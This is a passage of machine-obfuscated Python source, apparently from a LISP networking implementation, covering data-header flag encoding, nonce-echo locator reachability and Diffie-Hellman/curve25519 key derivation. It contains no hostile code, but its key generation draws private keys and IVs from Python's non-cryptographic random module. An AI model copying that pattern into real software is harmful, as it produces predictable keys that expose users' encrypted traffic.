i1ii11III1 += ", icmp-seq {}" . format ( oO0OO0O )
if 70 - 70: i1IIi % OoO0O00 / i1IIi
if 30 - 30: OoOoOO00 - i11iIiiIii
if ( self . packet_error != "" ) :
i1ii11III1 += " ({})" . format ( self . packet_error )
if 94 - 94: OoOoOO00 % iII111i
i1ii11III1 += "\n"
return ( i1ii11III1 )
if 39 - 39: OoOoOO00 + I1Ii111 % O0
if 26 - 26: ooOoO0o + OoOoOO00
def is_trace ( self ) :
IIiii1I1I = [ self . inner_sport , self . inner_dport ]
return ( self . inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in IIiii1I1I )
if 17 - 17: I1ii11iIi11i - iII111i % Oo0Ooo * O0 % O0 * OOooOOo
if 6 - 6: I1Ii111
if 46 - 46: II111iiii * I1Ii111
if 23 - 23: i1IIi - O0
if 6 - 6: ooOoO0o % OoooooooOO * I1Ii111 - IiII
if 24 - 24: I11i / iIii1I11I1II1 . OoooooooOO % OoOoOO00 . Ii1I
if 73 - 73: I1Ii111
if 25 - 25: IiII
if 77 - 77: o0oOOo0O0Ooo . iIii1I11I1II1 . OoooooooOO . iIii1I11I1II1
if 87 - 87: II111iiii - OoooooooOO / i1IIi . Ii1I - Oo0Ooo . i11iIiiIii
if 47 - 47: Oo0Ooo % OoO0O00 - ooOoO0o - Oo0Ooo * oO0o
if 72 - 72: o0oOOo0O0Ooo % o0oOOo0O0Ooo + iII111i + I1ii11iIi11i / Oo0Ooo
if 30 - 30: Oo0Ooo + I1IiiI + i11iIiiIii / OoO0O00
if 64 - 64: IiII
if 80 - 80: I1IiiI - i11iIiiIii / OoO0O00 / OoOoOO00 + OoOoOO00
if 89 - 89: O0 + IiII * I1Ii111
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
if 30 - 30: OoOoOO00
class lisp_data_header ( ) :
def __init__ ( self ) :
self . first_long = 0
self . second_long = 0
self . k_bits = 0
if 39 - 39: I1ii11iIi11i + o0oOOo0O0Ooo + I1Ii111 + IiII
if 48 - 48: I1Ii111 / ooOoO0o . iIii1I11I1II1
def print_header ( self , e_or_d ) :
ooo0OOoo = lisp_hex_string ( self . first_long & 0xffffff )
oO0o00O = lisp_hex_string ( self . second_long ) . zfill ( 8 )
if 7 - 7: Oo0Ooo * OoO0O00 - II111iiii % I1Ii111 . Oo0Ooo . Oo0Ooo
oOOo0ooO0 = ( "{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + "iid/lsb: {}" )
if 5 - 5: OoooooooOO * I1ii11iIi11i
return ( oOOo0ooO0 . format ( bold ( e_or_d , False ) ,
"N" if ( self . first_long & LISP_N_BIT ) else "n" ,
"L" if ( self . first_long & LISP_L_BIT ) else "l" ,
"E" if ( self . first_long & LISP_E_BIT ) else "e" ,
"V" if ( self . first_long & LISP_V_BIT ) else "v" ,
"I" if ( self . first_long & LISP_I_BIT ) else "i" ,
"P" if ( self . first_long & LISP_P_BIT ) else "p" ,
"K" if ( self . k_bits in [ 2 , 3 ] ) else "k" ,
"K" if ( self . k_bits in [ 1 , 3 ] ) else "k" ,
ooo0OOoo , oO0o00O ) )
if 42 - 42: o0oOOo0O0Ooo . I1Ii111 / O0 . II111iiii * OoOoOO00
if 7 - 7: I1Ii111 * O0 + OoOoOO00
def encode ( self ) :
O00oO00oOO00O = "II"
ooo0OOoo = socket . htonl ( self . first_long )
oO0o00O = socket . htonl ( self . second_long )
if 69 - 69: i1IIi % OoO0O00 % I1Ii111 / ooOoO0o / ooOoO0o
Ii1I1i1IiiI = struct . pack ( O00oO00oOO00O , ooo0OOoo , oO0o00O )
return ( Ii1I1i1IiiI )
if 37 - 37: I1IiiI + OoooooooOO . I1Ii111 + I1IiiI . IiII
if 44 - 44: OoOoOO00 . I1Ii111 . i1IIi . OoOoOO00 * ooOoO0o
def decode ( self , packet ) :
O00oO00oOO00O = "II"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( False )
if 50 - 50: ooOoO0o
ooo0OOoo , oO0o00O = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 81 - 81: i11iIiiIii * iIii1I11I1II1 / Oo0Ooo * OOooOOo
if 83 - 83: i11iIiiIii - I1IiiI * i11iIiiIii
self . first_long = socket . ntohl ( ooo0OOoo )
self . second_long = socket . ntohl ( oO0o00O )
self . k_bits = ( self . first_long & LISP_K_BITS ) >> 24
return ( True )
if 59 - 59: iII111i - OoooooooOO / ooOoO0o + I1ii11iIi11i . o0oOOo0O0Ooo - iII111i
if 29 - 29: oO0o
def key_id ( self , key_id ) :
self . first_long &= ~ ( 0x3 << 24 )
self . first_long |= ( ( key_id & 0x3 ) << 24 )
self . k_bits = key_id
if 26 - 26: O0 % OOooOOo - IiII . OOooOOo
if 70 - 70: o0oOOo0O0Ooo + I11i / iII111i + ooOoO0o / I1IiiI
def nonce ( self , nonce ) :
self . first_long |= LISP_N_BIT
self . first_long |= nonce
if 33 - 33: OoooooooOO . O0
if 59 - 59: iIii1I11I1II1
def map_version ( self , version ) :
self . first_long |= LISP_V_BIT
self . first_long |= version
if 45 - 45: O0
if 78 - 78: I11i - iIii1I11I1II1 + I1Ii111 - I1ii11iIi11i - I1Ii111
def instance_id ( self , iid ) :
if ( iid == 0 ) : return
self . first_long |= LISP_I_BIT
self . second_long &= 0xff
self . second_long |= ( iid << 8 )
if 21 - 21: OoooooooOO . O0 / i11iIiiIii
if 86 - 86: OoOoOO00 / OOooOOo
def get_instance_id ( self ) :
return ( ( self . second_long >> 8 ) & 0xffffff )
if 40 - 40: iIii1I11I1II1 / ooOoO0o / I1IiiI + I1ii11iIi11i * OOooOOo
if 1 - 1: OoO0O00 * ooOoO0o + IiII . oO0o / ooOoO0o
def locator_status_bits ( self , lsbs ) :
self . first_long |= LISP_L_BIT
self . second_long &= 0xffffff00
self . second_long |= ( lsbs & 0xff )
if 91 - 91: Ii1I + I11i - Oo0Ooo % OoOoOO00 . iII111i
if 51 - 51: OOooOOo / I11i
def is_request_nonce ( self , nonce ) :
return ( nonce & 0x80000000 )
if 51 - 51: ooOoO0o * oO0o - I1Ii111 + iII111i
if 46 - 46: o0oOOo0O0Ooo - i11iIiiIii % OoO0O00 / Ii1I - OoOoOO00
def request_nonce ( self , nonce ) :
self . first_long |= LISP_E_BIT
self . first_long |= LISP_N_BIT
self . first_long |= ( nonce & 0xffffff )
if 88 - 88: oO0o * I1IiiI / OoO0O00 - OOooOOo / i1IIi . I1Ii111
if 26 - 26: i11iIiiIii - ooOoO0o
def is_e_bit_set ( self ) :
return ( self . first_long & LISP_E_BIT )
if 45 - 45: ooOoO0o + II111iiii % iII111i
if 55 - 55: ooOoO0o - oO0o % I1IiiI
def get_nonce ( self ) :
return ( self . first_long & 0xffffff )
if 61 - 61: ooOoO0o
if 22 - 22: iIii1I11I1II1 / ooOoO0o / I1IiiI - o0oOOo0O0Ooo
if 21 - 21: oO0o . i11iIiiIii * I11i . OOooOOo / OOooOOo
class lisp_echo_nonce ( ) :
def __init__ ( self , rloc_str ) :
self . rloc_str = rloc_str
self . rloc = lisp_address ( LISP_AFI_NONE , rloc_str , 0 , 0 )
self . request_nonce_sent = None
self . echo_nonce_sent = None
self . last_request_nonce_sent = None
self . last_new_request_nonce_sent = None
self . last_echo_nonce_sent = None
self . last_new_echo_nonce_sent = None
self . request_nonce_rcvd = None
self . echo_nonce_rcvd = None
self . last_request_nonce_rcvd = None
self . last_echo_nonce_rcvd = None
self . last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list [ rloc_str ] = self
if 42 - 42: OoooooooOO / I1Ii111 . o0oOOo0O0Ooo / O0 - IiII * IiII
if 1 - 1: Ii1I % I1Ii111
def send_ipc ( self , ipc_socket , ipc ) :
oo00Oo0 = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
oO0o0 = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc ( ipc , oo00Oo0 )
lisp_ipc ( ipc , ipc_socket , oO0o0 )
if 28 - 28: Ii1I
if 36 - 36: I1Ii111 / I1Ii111 % oO0o
def send_request_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
OoOO0o00OOO0o = "nonce%R%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , OoOO0o00OOO0o )
if 52 - 52: OoooooooOO / Ii1I - O0 % i1IIi * OOooOOo
if 92 - 92: Oo0Ooo % OoooooooOO - i11iIiiIii
def send_echo_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
OoOO0o00OOO0o = "nonce%E%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , OoOO0o00OOO0o )
if 46 - 46: Oo0Ooo
if 99 - 99: OoO0O00 - ooOoO0o * O0 * I1ii11iIi11i * iIii1I11I1II1 - iIii1I11I1II1
def receive_request ( self , ipc_socket , nonce ) :
IIIi1ii1i1 = self . request_nonce_rcvd
self . request_nonce_rcvd = nonce
self . last_request_nonce_rcvd = lisp_get_timestamp ( )
if ( lisp_i_am_rtr ) : return
if ( IIIi1ii1i1 != nonce ) : self . send_request_ipc ( ipc_socket , nonce )
if 6 - 6: iIii1I11I1II1 * II111iiii
if 38 - 38: I1IiiI
def receive_echo ( self , ipc_socket , nonce ) :
if ( self . request_nonce_sent != nonce ) : return
self . last_echo_nonce_rcvd = lisp_get_timestamp ( )
if ( self . echo_nonce_rcvd == nonce ) : return
if 42 - 42: o0oOOo0O0Ooo
self . echo_nonce_rcvd = nonce
if ( lisp_i_am_rtr ) : return
self . send_echo_ipc ( ipc_socket , nonce )
if 8 - 8: i11iIiiIii / ooOoO0o
if 33 - 33: I1Ii111 * IiII - O0 + I1IiiI / IiII
def get_request_or_echo_nonce ( self , ipc_socket , remote_rloc ) :
if 19 - 19: i1IIi % II111iiii
if 85 - 85: IiII - o0oOOo0O0Ooo % OOooOOo - II111iiii
if 56 - 56: Ii1I * i11iIiiIii
if 92 - 92: II111iiii - O0 . I1Ii111
if 59 - 59: OoOoOO00
if ( self . request_nonce_sent and self . echo_nonce_sent and remote_rloc ) :
iiII1iiI = lisp_myrlocs [ 0 ] if remote_rloc . is_ipv4 ( ) else lisp_myrlocs [ 1 ]
if 57 - 57: i11iIiiIii - I11i / ooOoO0o / o0oOOo0O0Ooo * i11iIiiIii * o0oOOo0O0Ooo
if 28 - 28: OoooooooOO % O0 - OOooOOo / o0oOOo0O0Ooo / I1IiiI
if ( remote_rloc . address > iiII1iiI . address ) :
OO0o = "exit"
self . request_nonce_sent = None
else :
OO0o = "stay in"
self . echo_nonce_sent = None
if 41 - 41: II111iiii * IiII / OoO0O00 . oO0o
if 50 - 50: OoooooooOO + iIii1I11I1II1 / oO0o / OOooOOo . i11iIiiIii . ooOoO0o
Ooo0OO00oo = bold ( "collision" , False )
I1111III111ii = red ( iiII1iiI . print_address_no_iid ( ) , False )
i11iII1IiI = red ( remote_rloc . print_address_no_iid ( ) , False )
lprint ( "Echo nonce {}, {} -> {}, {} request-nonce mode" . format ( Ooo0OO00oo ,
I1111III111ii , i11iII1IiI , OO0o ) )
if 21 - 21: IiII * OoOoOO00 - I1Ii111
if 44 - 44: OoooooooOO + Ii1I
if 84 - 84: i1IIi - II111iiii . OoooooooOO / OoOoOO00 % Ii1I
if 7 - 7: i1IIi / IiII / iII111i
if 97 - 97: OoO0O00 + iIii1I11I1II1
if ( self . echo_nonce_sent != None ) :
oOO000 = self . echo_nonce_sent
oOo = bold ( "Echoing" , False )
lprint ( "{} nonce 0x{} to {}" . format ( oOo ,
lisp_hex_string ( oOO000 ) , red ( self . rloc_str , False ) ) )
self . last_echo_nonce_sent = lisp_get_timestamp ( )
self . echo_nonce_sent = None
return ( oOO000 )
if 79 - 79: ooOoO0o + oO0o - II111iiii . Oo0Ooo
if 26 - 26: IiII
if 52 - 52: O0 + ooOoO0o
if 11 - 11: i1IIi / I1Ii111 * I1ii11iIi11i * I1Ii111 * ooOoO0o - i11iIiiIii
if 96 - 96: I1ii11iIi11i % I1ii11iIi11i
if 1 - 1: I1IiiI . Ii1I
if 26 - 26: oO0o - ooOoO0o % Oo0Ooo - oO0o + IiII
oOO000 = self . request_nonce_sent
I1IIII = self . last_request_nonce_sent
if ( oOO000 and I1IIII != None ) :
if ( time . time ( ) - I1IIII >= LISP_NONCE_ECHO_INTERVAL ) :
self . request_nonce_sent = None
lprint ( "Stop request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( oOO000 ) ) )
if 69 - 69: IiII
return ( None )
if 24 - 24: OoO0O00 / O0 * ooOoO0o % iIii1I11I1II1 + i1IIi % O0
if 26 - 26: ooOoO0o + IiII - O0 * oO0o * II111iiii . I1ii11iIi11i
if 75 - 75: OoOoOO00 / OoooooooOO / I11i % OoOoOO00 * Ii1I * IiII
if 11 - 11: I1ii11iIi11i / OOooOOo . Ii1I * I1ii11iIi11i
if 17 - 17: I1ii11iIi11i * OoooooooOO % i1IIi % OoooooooOO . iII111i
if 20 - 20: OoO0O00 . oO0o
if 4 - 4: Oo0Ooo % Ii1I % OoO0O00 * iII111i % OoooooooOO
if 38 - 38: OoooooooOO . iII111i
if 43 - 43: OoooooooOO
if ( oOO000 == None ) :
oOO000 = lisp_get_data_nonce ( )
if ( self . recently_requested ( ) ) : return ( oOO000 )
if 8 - 8: OOooOOo + I11i . I11i
self . request_nonce_sent = oOO000
lprint ( "Start request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( oOO000 ) ) )
if 89 - 89: I1ii11iIi11i * I1ii11iIi11i * OoOoOO00 / iII111i
self . last_new_request_nonce_sent = lisp_get_timestamp ( )
if 60 - 60: OoO0O00 / iII111i / I1IiiI + oO0o
if 93 - 93: OoooooooOO * Ii1I / O0 + Ii1I - iIii1I11I1II1
if 6 - 6: IiII - Oo0Ooo - I11i - O0 % OoooooooOO
if 88 - 88: O0 / o0oOOo0O0Ooo * o0oOOo0O0Ooo . o0oOOo0O0Ooo . O0
if 27 - 27: i11iIiiIii % iII111i + Ii1I . OOooOOo
if ( lisp_i_am_itr == False ) : return ( oOO000 | 0x80000000 )
self . send_request_ipc ( ipc_socket , oOO000 )
else :
lprint ( "Continue request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( oOO000 ) ) )
if 9 - 9: OoO0O00
if 43 - 43: Ii1I . OOooOOo + I1IiiI * i11iIiiIii
if 2 - 2: OOooOOo
if 3 - 3: I1IiiI . iII111i % O0 - ooOoO0o / O0
if 79 - 79: Ii1I + oO0o % ooOoO0o % I1IiiI
if 68 - 68: II111iiii - OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo % II111iiii
if 53 - 53: iII111i . oO0o / Oo0Ooo . OoO0O00 . i11iIiiIii
self . last_request_nonce_sent = lisp_get_timestamp ( )
return ( oOO000 | 0x80000000 )
if 60 - 60: II111iiii
if 25 - 25: Oo0Ooo + o0oOOo0O0Ooo - OoO0O00
def request_nonce_timeout ( self ) :
if ( self . request_nonce_sent == None ) : return ( False )
if ( self . request_nonce_sent == self . echo_nonce_rcvd ) : return ( False )
if 57 - 57: II111iiii . i1IIi
oO000o0Oo00 = time . time ( ) - self . last_request_nonce_sent
I11Ii1 = self . last_echo_nonce_rcvd
return ( oO000o0Oo00 >= LISP_NONCE_ECHO_INTERVAL and I11Ii1 == None )
if 63 - 63: i1IIi
if 42 - 42: oO0o - i11iIiiIii % oO0o - I1Ii111 * O0 / II111iiii
def recently_requested ( self ) :
I11Ii1 = self . last_request_nonce_sent
if ( I11Ii1 == None ) : return ( False )
if 5 - 5: Oo0Ooo
oO000o0Oo00 = time . time ( ) - I11Ii1
return ( oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL )
if 84 - 84: I1ii11iIi11i
if 53 - 53: oO0o
def recently_echoed ( self ) :
if ( self . request_nonce_sent == None ) : return ( True )
if 26 - 26: I1Ii111 / I1Ii111 + Oo0Ooo - o0oOOo0O0Ooo % II111iiii . OoooooooOO
if 7 - 7: II111iiii - I1ii11iIi11i / I11i % OoooooooOO + i1IIi
if 42 - 42: I11i + i1IIi - Ii1I / IiII . iII111i
if 30 - 30: Oo0Ooo + Ii1I % i11iIiiIii * i1IIi + I1IiiI % OOooOOo
I11Ii1 = self . last_good_echo_nonce_rcvd
if ( I11Ii1 == None ) : I11Ii1 = 0
oO000o0Oo00 = time . time ( ) - I11Ii1
if ( oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL ) : return ( True )
if 30 - 30: i11iIiiIii * Oo0Ooo . II111iiii + I1ii11iIi11i / o0oOOo0O0Ooo % I1Ii111
if 78 - 78: I1ii11iIi11i + OoooooooOO - I1IiiI * OoOoOO00 * iII111i
if 7 - 7: OOooOOo . IiII . I1Ii111 / Ii1I / Oo0Ooo
if 83 - 83: I11i / Oo0Ooo
if 23 - 23: iIii1I11I1II1
if 10 - 10: I11i - o0oOOo0O0Ooo % OoooooooOO - I1ii11iIi11i
I11Ii1 = self . last_new_request_nonce_sent
if ( I11Ii1 == None ) : I11Ii1 = 0
oO000o0Oo00 = time . time ( ) - I11Ii1
return ( oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL )
if 64 - 64: OoO0O00 / I1IiiI
if 23 - 23: I11i * I1Ii111 * o0oOOo0O0Ooo - I1IiiI % OoOoOO00 + o0oOOo0O0Ooo
def change_state ( self , rloc ) :
if ( rloc . up_state ( ) and self . recently_echoed ( ) == False ) :
I1ii11ii1iiI = bold ( "down" , False )
oO0oo0 = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
lprint ( "Take {} {}, last good echo: {}" . format ( red ( self . rloc_str , False ) , I1ii11ii1iiI , oO0oo0 ) )
if 12 - 12: i11iIiiIii + i1IIi - Ii1I + O0 . I1IiiI
rloc . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc . last_state_change = lisp_get_timestamp ( )
return
if 8 - 8: o0oOOo0O0Ooo
if 78 - 78: i1IIi - Oo0Ooo
if ( rloc . no_echoed_nonce_state ( ) == False ) : return
if 48 - 48: Ii1I - OoooooooOO + I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 . I1IiiI
if ( self . recently_requested ( ) == False ) :
i11iII11I1III = bold ( "up" , False )
lprint ( "Bring {} {}, retry request-nonce mode" . format ( red ( self . rloc_str , False ) , i11iII11I1III ) )
if 44 - 44: OOooOOo . iIii1I11I1II1 . i11iIiiIii % OoooooooOO . ooOoO0o
rloc . state = LISP_RLOC_UP_STATE
rloc . last_state_change = lisp_get_timestamp ( )
if 53 - 53: IiII + O0
if 88 - 88: OoooooooOO
if 46 - 46: O0 % OoooooooOO
def print_echo_nonce ( self ) :
I1IiII = lisp_print_elapsed ( self . last_request_nonce_sent )
o0O00o0o = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
if 31 - 31: ooOoO0o % I1IiiI % IiII / I1Ii111
OoOOoo = lisp_print_elapsed ( self . last_echo_nonce_sent )
I1OooO00Oo = lisp_print_elapsed ( self . last_request_nonce_rcvd )
IiII1iiI = space ( 4 )
if 81 - 81: I1ii11iIi11i - OoO0O00 * oO0o
Oo0Ooo0O0 = "Nonce-Echoing:\n"
Oo0Ooo0O0 += ( "{}Last request-nonce sent: {}\n{}Last echo-nonce " + "received: {}\n" ) . format ( IiII1iiI , I1IiII , IiII1iiI , o0O00o0o )
if 81 - 81: iII111i - Ii1I - OOooOOo % IiII % o0oOOo0O0Ooo . iIii1I11I1II1
Oo0Ooo0O0 += ( "{}Last request-nonce received: {}\n{}Last echo-nonce " + "sent: {}" ) . format ( IiII1iiI , I1OooO00Oo , IiII1iiI , OoOOoo )
if 79 - 79: I1ii11iIi11i - I1ii11iIi11i . Ii1I / IiII
if 57 - 57: ooOoO0o * iIii1I11I1II1 * iII111i * Ii1I / Ii1I
return ( Oo0Ooo0O0 )
if 43 - 43: O0 * i11iIiiIii - OoooooooOO - oO0o
if 46 - 46: oO0o * i1IIi / I1ii11iIi11i
if 100 - 100: I1IiiI - OOooOOo
if 91 - 91: o0oOOo0O0Ooo * I1ii11iIi11i - iII111i . II111iiii
if 1 - 1: OOooOOo + I1Ii111 * I1ii11iIi11i
if 44 - 44: iII111i
if 79 - 79: o0oOOo0O0Ooo % OOooOOo . O0
if 56 - 56: oO0o + i1IIi * iII111i - O0
if 84 - 84: iII111i % I1IiiI / iIii1I11I1II1 * Ii1I * iIii1I11I1II1 + I1ii11iIi11i
class lisp_keys ( ) :
def __init__ ( self , key_id , do_curve = True , do_chacha = use_chacha ,
do_poly = use_poly ) :
self . uptime = lisp_get_timestamp ( )
self . last_rekey = None
self . rekey_count = 0
self . use_count = 0
self . key_id = key_id
self . cipher_suite = LISP_CS_1024
self . dh_g_value = LISP_CS_1024_G
self . dh_p_value = LISP_CS_1024_P
self . curve25519 = None
self . cipher_suite_string = ""
if ( do_curve ) :
if ( do_chacha ) :
self . cipher_suite = LISP_CS_25519_CHACHA
self . cipher_suite_string = "chacha"
elif ( os . getenv ( "LISP_USE_AES_GCM" ) != None ) :
self . cipher_suite = LISP_CS_25519_GCM
self . cipher_suite_string = "aes-gcm"
else :
self . cipher_suite = LISP_CS_25519_CBC
self . cipher_suite_string = "aes-cbc"
if 78 - 78: IiII / iII111i * Ii1I . OOooOOo . oO0o - I1Ii111
self . local_private_key = random . randint ( 0 , 2 ** 128 - 1 )
ii1i1I1111ii = lisp_hex_string ( self . local_private_key ) . zfill ( 32 )
self . curve25519 = curve25519 . Private ( ii1i1I1111ii )
else :
self . local_private_key = random . randint ( 0 , 0x1fff )
if 39 - 39: ooOoO0o . i1IIi + OoooooooOO . iII111i - i11iIiiIii % I1Ii111
self . local_public_key = self . compute_public_key ( )
self . remote_public_key = None
self . shared_key = None
self . encrypt_key = None
self . icv_key = None
self . icv = poly1305 if do_poly else hashlib . sha256
self . iv = None
self . get_iv ( )
self . do_poly = do_poly
if 38 - 38: oO0o
if 9 - 9: I11i . OoO0O00 . oO0o / OoooooooOO
def copy_keypair ( self , key ) :
self . local_private_key = key . local_private_key
self . local_public_key = key . local_public_key
self . curve25519 = key . curve25519
if 59 - 59: iIii1I11I1II1 + i1IIi % II111iiii
if 2 - 2: II111iiii + I11i . OoO0O00
def get_iv ( self ) :
if ( self . iv == None ) :
self . iv = random . randint ( 0 , LISP_16_128_MASK )
else :
self . iv += 1
if 14 - 14: OOooOOo * I1IiiI - I1ii11iIi11i
i1Oo = self . iv
if ( self . cipher_suite == LISP_CS_25519_CHACHA ) :
i1Oo = struct . pack ( "Q" , i1Oo & LISP_8_64_MASK )
elif ( self . cipher_suite == LISP_CS_25519_GCM ) :
I1111I1i1i = struct . pack ( "I" , ( i1Oo >> 64 ) & LISP_4_32_MASK )
O0oOo = struct . pack ( "Q" , i1Oo & LISP_8_64_MASK )
i1Oo = I1111I1i1i + O0oOo
else :
i1Oo = struct . pack ( "QQ" , i1Oo >> 64 , i1Oo & LISP_8_64_MASK )
return ( i1Oo )
if 14 - 14: I1Ii111 + I1Ii111 / OoOoOO00 + OoOoOO00 * ooOoO0o / I1Ii111
if 68 - 68: OoooooooOO
def key_length ( self , key ) :
if ( type ( key ) != str ) : key = self . normalize_pub_key ( key )
return ( len ( key ) / 2 )
if 38 - 38: iII111i + ooOoO0o
if 32 - 32: ooOoO0o - OoooooooOO + OoO0O00
def print_key ( self , key ) :
OOOo0Oo0O = self . normalize_pub_key ( key )
return ( "0x{}...{}({})" . format ( OOOo0Oo0O [ 0 : 4 ] , OOOo0Oo0O [ - 4 : : ] , self . key_length ( OOOo0Oo0O ) ) )
if 90 - 90: I1ii11iIi11i / OoooooooOO % i11iIiiIii - IiII
if 30 - 30: iII111i
def normalize_pub_key ( self , key ) :
if ( type ( key ) == str ) :
if ( self . curve25519 ) : return ( binascii . hexlify ( key ) )
return ( key )
if 44 - 44: OoOoOO00 . OOooOOo
key = lisp_hex_string ( key ) . zfill ( 256 )
return ( key )
if 84 - 84: I1Ii111 - I11i * OoOoOO00
if 52 - 52: iII111i . IiII - I1ii11iIi11i * iIii1I11I1II1 % o0oOOo0O0Ooo / ooOoO0o
def print_keys ( self , do_bold = True ) :
I1111III111ii = bold ( "local-key: " , False ) if do_bold else "local-key: "
if ( self . local_public_key == None ) :
I1111III111ii += "none"
else :
I1111III111ii += self . print_key ( self . local_public_key )
if 18 - 18: OoOoOO00 % oO0o % OoO0O00 / iII111i
i11iII1IiI = bold ( "remote-key: " , False ) if do_bold else "remote-key: "
if ( self . remote_public_key == None ) :
i11iII1IiI += "none"
else :
i11iII1IiI += self . print_key ( self . remote_public_key )
if 88 - 88: iII111i * OOooOOo / i11iIiiIii / i1IIi
O0O00O0O0 = "ECDH" if ( self . curve25519 ) else "DH"
ii1IiIi1iIi = self . cipher_suite
return ( "{} cipher-suite: {}, {}, {}" . format ( O0O00O0O0 , ii1IiIi1iIi , I1111III111ii , i11iII1IiI ) )
if 16 - 16: OOooOOo % I1IiiI . I1Ii111 * OoO0O00 % O0 . OOooOOo
if 94 - 94: I1ii11iIi11i
def compare_keys ( self , keys ) :
if ( self . dh_g_value != keys . dh_g_value ) : return ( False )
if ( self . dh_p_value != keys . dh_p_value ) : return ( False )
if ( self . remote_public_key != keys . remote_public_key ) : return ( False )
return ( True )
if 33 - 33: I1ii11iIi11i + I1ii11iIi11i . Ii1I
if 27 - 27: II111iiii - i11iIiiIii - OoooooooOO
def compute_public_key ( self ) :
if ( self . curve25519 ) : return ( self . curve25519 . get_public ( ) . public )
if 90 - 90: I1IiiI
ii1i1I1111ii = self . local_private_key
i11ii = self . dh_g_value
III1I1Iii1 = self . dh_p_value
return ( int ( ( i11ii ** ii1i1I1111ii ) % III1I1Iii1 ) )
if 34 - 34: oO0o - II111iiii - o0oOOo0O0Ooo + iII111i + I1Ii111
if 70 - 70: OoooooooOO + OoO0O00 * Oo0Ooo
def compute_shared_key ( self , ed , print_shared = False ) :
ii1i1I1111ii = self . local_private_key
IiIi11iI1 = self . remote_public_key
if 50 - 50: iIii1I11I1II1 + I1Ii111 - I11i - OoooooooOO
oO00O0oO = bold ( "Compute {} shared-key" . format ( ed ) , False )
lprint ( "{}, key-material: {}" . format ( oO00O0oO , self . print_keys ( ) ) )
if 69 - 69: OOooOOo + OOooOOo * Ii1I * I11i + I1IiiI
if ( self . curve25519 ) :
ii1i11iiII = curve25519 . Public ( IiIi11iI1 )
self . shared_key = self . curve25519 . get_shared_key ( ii1i11iiII )
else :
III1I1Iii1 = self . dh_p_value
self . shared_key = ( IiIi11iI1 ** ii1i1I1111ii ) % III1I1Iii1
if 40 - 40: iII111i
if 62 - 62: ooOoO0o / OOooOOo
if 74 - 74: iII111i % I1Ii111 / I1Ii111 - iIii1I11I1II1 - II111iiii + OOooOOo
if 92 - 92: I11i % I1Ii111
if 18 - 18: ooOoO0o + I1Ii111 / OOooOOo / oO0o + iIii1I11I1II1 % IiII
if 94 - 94: I11i
if 37 - 37: oO0o
if ( print_shared ) :
OOOo0Oo0O = self . print_key ( self . shared_key )
lprint ( "Computed shared-key: {}" . format ( OOOo0Oo0O ) )
if 52 - 52: I1ii11iIi11i * I1IiiI . OOooOOo + i1IIi % oO0o / iIii1I11I1II1
if 68 - 68: I1Ii111 - OoOoOO00 . i11iIiiIii + o0oOOo0O0Ooo
if 71 - 71: i11iIiiIii / i1IIi * I1IiiI / OoOoOO00
if 33 - 33: I11i . Oo0Ooo
if 89 - 89: iII111i + i1IIi - IiII + ooOoO0o . II111iiii
self . compute_encrypt_icv_keys ( )
if 85 - 85: iIii1I11I1II1 - Ii1I * Oo0Ooo . oO0o + I1Ii111
if 13 - 13: O0 + iIii1I11I1II1 % II111iiii + iIii1I11I1II1
if 85 - 85: I1IiiI * iIii1I11I1II1 . iII111i / iII111i
if 43 - 43: I1IiiI
self . rekey_count += 1
self . last_rekey = lisp_get_timestamp ( )
if 78 - 78: OoO0O00 % II111iiii + OoOoOO00 / I1IiiI
if 34 - 34: o0oOOo0O0Ooo % I1ii11iIi11i + Ii1I * I11i / oO0o
def compute_encrypt_icv_keys ( self ) :
i111Iii11i1Ii = hashlib . sha256
if ( self . curve25519 ) :
oo00000ooOooO = self . shared_key
else :
oo00000ooOooO = lisp_hex_string ( self . shared_key )
if 56 - 56: I1IiiI . IiII
if 53 - 53: ooOoO0o - OoOoOO00 + IiII
if 100 - 100: oO0o + OoO0O00
if 95 - 95: i11iIiiIii . o0oOOo0O0Ooo + OoooooooOO % Oo0Ooo
if 21 - 21: iII111i - o0oOOo0O0Ooo / I11i % O0 / iIii1I11I1II1 / iII111i
I1111III111ii = self . local_public_key
if ( type ( I1111III111ii ) != long ) : I1111III111ii = int ( binascii . hexlify ( I1111III111ii ) , 16 )
i11iII1IiI = self . remote_public_key
if ( type ( i11iII1IiI ) != long ) : i11iII1IiI = int ( binascii . hexlify ( i11iII1IiI ) , 16 )
iIiii1Ii = "0001" + "lisp-crypto" + lisp_hex_string ( I1111III111ii ^ i11iII1IiI ) + "0100"
if 17 - 17: O0 - Ii1I + IiII
iIIII11iII = hmac . new ( iIiii1Ii , oo00000ooOooO , i111Iii11i1Ii ) . hexdigest ( )
iIIII11iII = int ( iIIII11iII , 16 )
if 78 - 78: IiII + I11i - o0oOOo0O0Ooo + OoO0O00 / iIii1I11I1II1
if 47 - 47: OOooOOo
if 20 - 20: I1Ii111 % ooOoO0o - I1Ii111 * OoooooooOO / I1ii11iIi11i
